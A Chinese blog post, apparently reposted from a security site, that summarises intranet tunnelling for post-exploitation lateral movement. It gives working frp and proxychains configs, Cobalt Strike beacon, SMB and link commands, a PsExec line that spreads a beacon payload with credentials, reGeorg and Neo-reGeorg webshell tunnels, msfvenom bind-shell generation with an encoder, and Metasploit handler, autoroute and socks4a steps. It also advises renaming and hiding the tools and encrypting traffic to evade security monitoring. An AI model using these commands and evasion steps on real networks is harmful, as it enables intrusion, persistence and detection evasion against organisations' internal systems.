干货!内网穿透的常用方法总结

1个月前发布 SanS三石
7 0 0

前言

在内网渗透时,一个WebShell或CobaltStrike、Metasploit上线等,只是开端,更多是要内网横向移动,扩大战果,打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”,才能进一步攻击。可实战中因为网络环境不同,所利用的方式就不同。

本文内容按以下思维导图展开

干货!内网穿透的常用方法总结

目标出网(socks代理)

这是实战中最愿意碰到的网络环境,目标机可以正常访问互联网,可直接在目标机挂socks代理或CobaltStrike上线,打通目标的内网通道。

frp(socks5)

frp服务端配置文件

[common]``bind_port = 8080

frp客户端配置文件

[common]``server_addr = xx.xx.xx.xx``server_port = 8080``#服务端口使用Web常见端口``[socks5]``type = tcp``remote_port = 8088``plugin = socks5``use_encryption = ``true``use_compression = ``true``#socks5口令``#plugin_user = SuperMan``#plugin_passwd = XpO2McWe6nj3

此处添加了加密压缩这两个功能,默认是不开启的,根据作者介绍,压缩算法使用的是 snappy。

use_encryption = true 启用加密 [通信内容加密传输,有效防止流量被拦截]

use_compression = true 启用压缩 [传输内容进行压缩,有效减小传输的网络流量,加快流量转发速度,但会额外消耗一些CPU资源]

use_encryption = true 、use_compression = true 必须放在相关协议下面。

frp客户端与配置文件传到目标机后,把程序名与配置文件进行修改,并放在系统相关文件夹中,做到隐蔽

干货!内网穿透的常用方法总结

setg Proxies socks5:xxx.xxx.xxx.xxx:8088

干货!内网穿透的常用方法总结

干货!内网穿透的常用方法总结

加密压缩的对比

这是frp客户端配置文件中未使用 encryptioncompression 功能,利用metasploit挂socks代理,扫描ms17_010传输的数据包,明显可辨别出具体攻击行为。如果目标内网有”态势感知“、流量分析等安全设备,就会被监测到,导致权限丢失。

干货!内网穿透的常用方法总结

使用 encryptioncompression 功能后,虽攻击源地址同样会暴露,但传输的数据包却无法辨别,规避了内网中的安全监测设备

干货!内网穿透的常用方法总结

CobaltStrike (socks4a)

到已控目标机的Beacon下将socks代理开启

beacon > socks 1024 #端口根据VPS实际情况进行设置

干货!内网穿透的常用方法总结

菜单栏中的 View > Proxy Pivots ,复制代理连接到Metasploit中,或直接将socks4a挂在相关安全工具中。

干货!内网穿透的常用方法总结

上线不出网机器

这是link链接,只要主链路(出网机Beacon)掉线,均掉!

SMB Beacon

官方对SMB Beacon的介绍:SMB Beacon是使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽。

创建一个SMB的Listener (host与port可无视),注意Listener选择,在session中选择route可达的主机派生会话。

(在Listner生成SMB Beacon>目标主机>右键> spawn as>选中对应的Listener>上线)

干货!内网穿透的常用方法总结

运行成功后,可以看到 ∞∞ 这个字符,这就是派生SMB Beacon的连接状态。

干货!内网穿透的常用方法总结

干货!内网穿透的常用方法总结

可在主Beacon上用link host链接或unlink host断开。

beacon> link 192.168.144.155``beacon> unlink 192.168.144.155

干货!内网穿透的常用方法总结

Link Listener

在已上线的主机创建Listener。

干货!内网穿透的常用方法总结

导出该类型Listener对应的可执行文件或dll等。

干货!内网穿透的常用方法总结

选择刚建立的Listener。

干货!内网穿透的常用方法总结

上传刚才生成的payload到当前已上线的目标机中,这里用PsExec.exe 工具 。(CobalStrike本身psexec功能不够强大)

干货!内网穿透的常用方法总结

在Beacon中使用PsExec工具将payload上传到不出网的目标机中,自动执行,上线。

beacon> shell C:WINDOWSTempPsExec.exe -accepteula \192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:WINDOWSTempbeacon.exe

干货!内网穿透的常用方法总结

beacon> shell netstat -ano |findstr 4444

干货!内网穿透的常用方法总结

SSH Login

beacon> ssh 192.168.144.174:22 root admin``beacon> ssh 192.168.144.203:22 root admin

干货!内网穿透的常用方法总结

在Linux目标机中查看网络连接状态,实际是与之前已上线的Windows主机建立的连接。

干货!内网穿透的常用方法总结

目标不出网(http代理)

目标机网络中可能有防火墙、网闸等,只允许http单向出,无法正常访问互联网,用上述socks方法是行不通的,只能用http代理进行渗透。

reGeorg (socks5)

python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1436″ data-rawheight=”847″ class=”origin_image zh-lightbox-thumb lazy” width=”1436″ data-original=”https://pic1.zhimg.com/v2-70edc0c3959cca217531e56634fb886c_r.jpg” data-actualsrc=”https://pic1.zhimg.com/v2-70edc0c3959cca217531e56634fb886c_b.jpg” data-original-token=”v2-13b8f8a651783f26828ace8f724125d9″>

Neo-reGeorg (加密)

python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http:``//192.168.144.211/neo-tunnel.aspx

使用Neo-reGeorg后,数据包已被加密传输。

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1436″ data-rawheight=”847″ class=”origin_image zh-lightbox-thumb lazy” width=”1436″ data-original=”https://pic1.zhimg.com/v2-70edc0c3959cca217531e56634fb886c_r.jpg” data-actualsrc=”https://pic1.zhimg.com/v2-70edc0c3959cca217531e56634fb886c_b.jpg” data-original-token=”v2-13b8f8a651783f26828ace8f724125d9″>

冰蝎 (开socks5)

冰蝎的数据包传输是加密的,本身也具备socks代理功能,但传输过程中存在丢包情况。这里同样是利用metasploit探测ms17_010漏洞,结果显示不存在。当不设置代理探测时,实际漏洞是存在的。

虽然冰蝎的这种代理扫描方式不如reGeorg准确,但小线程的端口探测等是可行的,如 auxiliary/scanner/portscan/tcp。准确度更多是因某种探测或其他方式的数据包在传输过程中的多少而决定。

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1198″ data-rawheight=”450″ class=”origin_image zh-lightbox-thumb lazy” width=”1198″ data-original=”https://pic4.zhimg.com/v2-6170b87a8f138fdd795b238644407f8b_r.jpg” data-actualsrc=”https://pic4.zhimg.com/v2-6170b87a8f138fdd795b238644407f8b_b.jpg” data-original-token=”v2-1be7137d1a41875c29bb7891da29fe1e”>

这里以reduh为例,虽然只能对指定的端口进行转发 (不适用图形化连接操作),但可以先利用msfvenom生成正向的shell payload,再结合reduh单端口转发,上线metasploit,最后利用socks4a模块开代理。

下面把具体的流程走一遍:

sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe` `#--platform <platform> 指定payload的目标平台``#-e, --encoder <encoder> 指定需要使用的编码器``#-i, --iterations <count> 指定payload的编码次数

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1186″ data-rawheight=”457″ class=”origin_image zh-lightbox-thumb lazy” width=”1186″ data-original=”https://pic2.zhimg.com/v2-cc6a8b063de72d86877635d7b8baf0ed_r.jpg” data-actualsrc=”https://pic2.zhimg.com/v2-cc6a8b063de72d86877635d7b8baf0ed_b.jpg” data-original-token=”v2-0fde47b30fc6edea6c4575d19bc36804″>

metasploit是监听转发后的地址与端口。

sudo msfconsole -q``msf5 > use exploit/multi/handler``msf5 exploit(multi/handler) > ``set` `payload windows/shell_bind_tcp``msf5 exploit(multi/handler) > ``set` `rhost 127.0.0.1``msf5 exploit(multi/handler) > ``set` `lport 5353``msf5 exploit(multi/handler) > run -j

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1317″ data-rawheight=”742″ class=”origin_image zh-lightbox-thumb lazy” width=”1317″ data-original=”https://pic2.zhimg.com/v2-d0dd0f0560f616b39045aa0685737189_r.jpg” data-actualsrc=”https://pic2.zhimg.com/v2-d0dd0f0560f616b39045aa0685737189_b.jpg” data-original-token=”v2-b5adc3568215845d7d38a3a7a6f991f6″>

可在metasploit渗透,或开启一个socks4a,挂载其他安全工具上继续渗透。

msf5 exploit(multi/handler) > use auxiliary/server/socks4a``msf5 auxiliary(server/socks4a) > ``set` `srvport 10080``msf5 auxiliary(server/socks4a) > run -j

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1314″ data-rawheight=”596″ class=”origin_image zh-lightbox-thumb lazy” width=”1314″ data-original=”https://pic4.zhimg.com/v2-b1b3dd7aa7d84d998b387c659659a17f_r.jpg” data-actualsrc=”https://pic4.zhimg.com/v2-b1b3dd7aa7d84d998b387c659659a17f_b.jpg” data-original-token=”v2-2e25e423a6e214b712c0f9d7554135c4″>

隔离网络(多级代理)

内网渗透中,会遇到隔离网络,更多时候是逻辑上的隔离,突破的办法就是拿到route可达的跳板机 (多张网卡、运维机等)的权限,建立一层二级代理、三级代理…

frp

现拿到一台双网卡内网服务器权限,可以用frp建立通道,这台服务器既是服务端也是客户端。

(具体,参考https://www.cnblogs.com/PANDA-Mosen/p/13096260.html

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1019″ data-rawheight=”954″ class=”origin_image zh-lightbox-thumb lazy” width=”1019″ data-original=”https://pic1.zhimg.com/v2-3592cdb9b64606326d0729c8ba43de60_r.jpg” data-actualsrc=”https://pic1.zhimg.com/v2-3592cdb9b64606326d0729c8ba43de60_b.jpg” data-original-token=”v2-5e21849f820b7be75891c67d9f529172″>

设置代理规则,选择对应代理。

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1235″ data-rawheight=”213″ class=”origin_image zh-lightbox-thumb lazy” width=”1235″ data-original=”https://pic4.zhimg.com/v2-4d7da13b54191fb003a2309e18f8554b_r.jpg” data-actualsrc=”https://pic4.zhimg.com/v2-4d7da13b54191fb003a2309e18f8554b_b.jpg” data-original-token=”v2-f283427f663ebe6811aa07eebed15c80″>

Proxychains

命令行代理神器proxychains,设置二层代理、socks口令。(注意代理顺序)

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1232″ data-rawheight=”198″ class=”origin_image zh-lightbox-thumb lazy” width=”1232″ data-original=”https://pic4.zhimg.com/v2-3b327a04c02ea8b1a766d3f51bd57463_r.jpg” data-actualsrc=”https://pic4.zhimg.com/v2-3b327a04c02ea8b1a766d3f51bd57463_b.png” data-original-token=”v2-3b327a04c02ea8b1a766d3f51bd57463″>

针对metasploit的利用,只要sessions中的route可达,就可以直接进行多层网络渗透,更加方便。但主session掉,均掉!

在获取目标一个sessions 后,可以查看IP段信息并自动添加路由表。

msf5 exploit(multi/handler) > sessions 1``meterpreter > run get_local_subnets``meterpreter > run autoroute -p``meterpreter > run post/multi/manage/autoroute``meterpreter > run autoroute -p``meterpreter > background

干货!内网穿透的常用方法总结” data-caption=”” data-size=”normal” data-rawwidth=”1357″ data-rawheight=”707″ class=”origin_image zh-lightbox-thumb lazy” width=”1357″ data-original=”https://pic1.zhimg.com/v2-0aa2a10b7e7d47f479e7fd8e6fe3f274_r.jpg” data-actualsrc=”https://pic1.zhimg.com/v2-0aa2a10b7e7d47f479e7fd8e6fe3f274_b.jpg” data-original-token=”v2-4bcc98fb438f46afd4d27cda936e333d”>

可在metasploit继续渗透,或开启一个socks,挂载其他工具上多层穿透。

msf5 exploit(multi/handler) > use auxiliary/server/socks4a``msf5 auxiliary(server/socks4a) > ``set` `srvport 1080``msf5 auxiliary(server/socks4a) > run -j

然后打开/etc/proxychains.conf

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...